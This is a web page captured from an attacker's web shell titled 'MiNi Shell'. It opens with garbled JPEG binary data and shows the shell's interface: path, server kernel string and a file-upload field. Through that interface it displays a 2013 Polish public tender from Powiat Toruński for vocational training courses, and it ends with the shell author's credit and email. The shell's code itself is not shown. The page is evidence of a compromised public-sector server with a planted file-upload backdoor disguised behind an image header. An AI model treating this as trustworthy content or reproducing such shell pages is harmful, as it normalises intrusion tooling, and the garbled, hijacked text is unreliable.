JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130227/81616-N-2013.html

<p class="kh_header"><b>Toruń: Szkolenia zawodowe dla uczestników projektu Szkoła  innowacyjna i konkurencyjna - dostosowanie oferty szkolnictwa zawodowego do wymagań lokalnego rynku pracy.</b><br>
<b>Numer ogłoszenia: 81616 - 2013; data zamieszczenia: 27.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Toruńskiego , ul. Towarowa 4-6, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 662 88 88, faks 0-56 662 88 89.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiattorunski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia zawodowe dla uczestników projektu Szkoła  innowacyjna i konkurencyjna - dostosowanie oferty szkolnictwa zawodowego do wymagań lokalnego rynku pracy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie następujących szkoleń zawodowych: część I - Kompleksowa organizacja i logistyka usług cateringowych (Liczba godzin szkolenia - 3 grupy x 16 godzin, Razem 48 godzin, Liczba uczestników - 22 uczniów 4 nauczycieli, Liczba grup szkoleniowych - 3); część II - Szkolenie z zakresu obsługi i wykorzystania urządzenia diagnostycznego KTS670 (Liczba godzin szkolenia - 3 grupy x 16 godzin. Razem 48 godzin, Liczba uczestników - 25 uczniów, 3 nauczycieli, Liczba grup szkoleniowych - 3; część III -Oprogramowanie hotelarskie (Liczba godzin szkolenia - 2 grupy x 6 godzin. Razem 12 godzin, liczba uczestników - 25 uczniów, Liczba grup szkoleniowych - 2); część IV - Szkolenie kelnerskie (Liczba godzin szkolenia - 3 grupy x 10 godzin. Razem 30 godzin, liczba uczestników - 25 uczniów, 4 nauczycieli, Liczba grup szkoleniowych -3); część V - Szkolenie z zakresu wizażu (Liczba godzin szkolenia - 3 grupy x 8 godzin. Razem 24 godziny, liczba uczestników - 25 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3); część VI - Szkolenie z zakresu techniki obróbki grafiki i wideo (Liczba godzin szkolenia - 2 grupy x 24 godziny. Razem 48 godzin, liczba uczestników - 24 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 2); część VII - Szkolenie z podstaw technologii światłowodowych (Liczba godzin szkolenia - 2 grupy x 16 godziny. Razem 32 godziny, liczba uczestników - 24 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 2); część VIII - Szkolenie z języka angielskiego w branży gastronomicznej (Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, liczba uczestników - 22 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3); część IX - Szkolenie z języka angielskiego w branży hotelarskiej (Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, liczba uczestników - 25 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3);
 część X - Szkolenie z języka angielskiego w branży motoryzacyjnej (Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, liczba uczestników - 25 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 3); część XI - Szkolenie z języka angielskiego w tele - informatyce (Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, liczba uczestników - 24 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 3).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - Doświadczenie - 0.20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiattorunski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Towarowa 4-6, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2013 godzina 09:00, miejsce: Starostwo Powiatowe, ul. Towarowa 4-6, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Szkoła  innowacyjna i konkurencyjna - dostosowanie oferty szkolnictwa zawodowego do wymagań lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach działania 9.6 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowa organizacja i logistyka usług cateringowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować: organizowanie bankietów i działalność cateringową (bankiety, ich rodzaje i organizację obsługi, kompleksowość w zaspokajaniu oczekiwań gości - usługi podstawowe i towarzyszące), usługi cateringowe - od oferty do działań posprzedażowych (planowanie cateringu, rodzaje i forma serwisu, wybór odpowiedniego miejsca, sprzęt niezbędny do wykonania usługi, wiedza kulinarna - właściwy dobór dań, karta zaproszeniowa, kalkulacja, realizacja usługi cateringowej, wrażenia estetyczne, wykonanie i przebieg usługi, zakończenie, kontroling i rozliczanie usług cateringowych), catering w ujęciu marketingowym i sprzedażowym (tworzenie oferty handlowej zaspokajającej potrzeby docelowego nabywcy, promocja i techniki sprzedaży), prawne aspekty realizacji usług cateringowych (bezpieczeństwo żywności, organizacja imprez masowych), Liczba godzin szkolenia - 3 grupy x 16 godzin. Razem 48 godzin, Liczba uczestników - 22 uczniów 4 nauczycieli, Liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie z zakresu obsługi i wykorzystania urządzenia diagnostycznego KTS670.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować przygotowanie do pracy, obsługę i wykorzystanie testera diagnostycznego sterowników KTS670, Liczba godzin szkolenia - 3 grupy x 16 godzin. Razem 48 godzin, liczba uczestników - 25 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oprogramowanie hotelarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie w zakresie obsługi branżowego oprogramowania Fidelio Suite 8 Proffessional, Liczba godzin szkolenia - 2 grupy x 6 godzin. Razem 12 godzin, liczba uczestników - 25 uczniów, liczba grup szkoleniowych - 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie kelnerskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować: organizacja zakładów gastronomicznych, technika pracy w zakładach gastronomicznych, techniki obsługi konsumenta przy stole, ogólne wiadomości o potrawach, podstawowa wiedza o winach, standard nakrycia stołu, praktyka z tacą, zasada fińska, rodzaje nakryć, serwowanie jednego talerza, noszenie talerzy zasadniczych, zbieranie brudnej zastawy stołowej, serwis niemiecki, kopuły, serwis francuski-plater, sztućce, Liczba godzin szkolenia - 3 grupy x 10 godzin. Razem 30 godzin, liczba uczestników - 25 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie z zakresu wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować: kurs wizażu i stylizacji, rodzajów makijażu - biznesowy na dzień i na wieczór, zasad doboru stroju biznesowego na dzień i na wieczór, doboru fryzur, zapachów, przeprowadzenia profesjonalnej autoprezentacji, stosowania zasad budowania wizerunku w miejscu pracy, stosowania zasad zachowań zgodnie z etykietą biznesu, wykorzystania aktywizujących metod pracy z grupą, radzenia sobie w sytuacjach komunikacyjnie trudnych, Liczba godzin szkolenia - 3 grupy x 8 godzin. Razem 24 godziny, liczba uczestników - 25 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie z zakresu techniki obróbki grafiki i wideo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować: tok pracy w programie Adobe Premiere Pro; interfejs programu i koncepcja projektu; importowanie materiału wideo z różnych źródeł i w różnych formatach: klipów, animacji, serii obrazów statycznych, plików programów Photoshop i Illustrator; pozyskiwanie materiału filmowego z taśmy; organizowanie i porządkowanie materiału źródłowego; przegląd i zastosowanie technik montażu; tworzenie sekwencji filmowych; edycja i montaż materiału dźwiękowego; efekty ruchu i animacja; rendering i kompresja materiału wideo; eksportowanie do różnych formatów (taśma, DVD, Internet, telefony komórkowe); przykłady wykorzystania programu Adobe Photoshop, konfiguracja optymalnych ustawień, praca z warstwami, obiekty wektorowe, efekty malowania, maski, własna biblioteka próbek, zaawansowane korekty kolorów i kontrastu, obiekty i sceny trójwymiarowe, tworzenie i edycja animacji i filmów wideo, Liczba godzin szkolenia - 2 grupy x 24 godziny. Razem 48 godzin, liczba uczestników - 24 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie z podstaw technologii światłowodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia winna obejmować: kable światłowodowe, spawanie kabli, osprzęt, złącza światłowodowe, pomiary połączeń, Działanie reflektometru, parametry przesyłu danych i ich pomiary, Szkolenie obejmuje zagadnienia teoretyczne oraz praktykę, przedstawienie zastosowań technologii światłowodowych w sieciach zakładowych, Liczba godzin szkolenia - 2 grupy x 16 godziny. Razem 32 godziny, liczba uczestników - 24 uczniów, 3 nauczycieli, liczba grup szkoleniowych - 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie z języka angielskiego w branży gastronomicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie pod kątem słownictwa i struktur w zakresie zawodu kucharz, zakres tematyczny winien przewidywać zarówno komunikację w zakresie typowych sytuacji związanych z branżą, jak również pracę z dostarczonymi, obcojęzycznymi, oryginalnymi tekstami branżowymi oraz materiałami pomocniczymi, Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, liczba uczestników - 22 uczniów, 4 nauczycieli, liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenie z języka angielskiego w branży hotelarskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie pod kątem słownictwa i struktur w zakresie zawodu technik hotelarstwa, zakres tematyczny winien przewidywać zarówno komunikację w zakresie typowych sytuacji związanych z branżą, jak również pracę z dostarczonymi, obcojęzycznymi, oryginalnymi tekstami branżowymi oraz materiałami pomocniczymi, Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, Liczba uczestników - 25 uczniów, 4 nauczycieli, Liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Szkolenie z języka angielskiego w branży motoryzacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie pod kątem słownictwa i struktur w zakresie zawodu technik pojazdów samochodowych, zakres tematyczny winien przewidywać zarówno komunikację w zakresie typowych sytuacji związanych z branżą, jak również pracę z dostarczonymi, obcojęzycznymi, oryginalnymi tekstami branżowymi oraz materiałami pomocniczymi, Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, Liczba uczestników - 25 uczniów, 3 nauczycieli, Liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Szkolenie z języka angielskiego w tele - informatyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie pod kątem słownictwa i struktur w zakresie zawodu technik teleinformatyk, zakres tematyczny winien przewidywać zarówno komunikację w zakresie typowych sytuacji związanych z branżą, jak również pracę z dostarczonymi, obcojęzycznymi, oryginalnymi tekstami branżowymi oraz materiałami pomocniczymi, Liczba godzin szkolenia - 3 grupy x 6 godzin. Razem 18 godzin, Liczba uczestników - 24 uczniów, 3 nauczycieli, Liczba grup szkoleniowych - 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.03.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com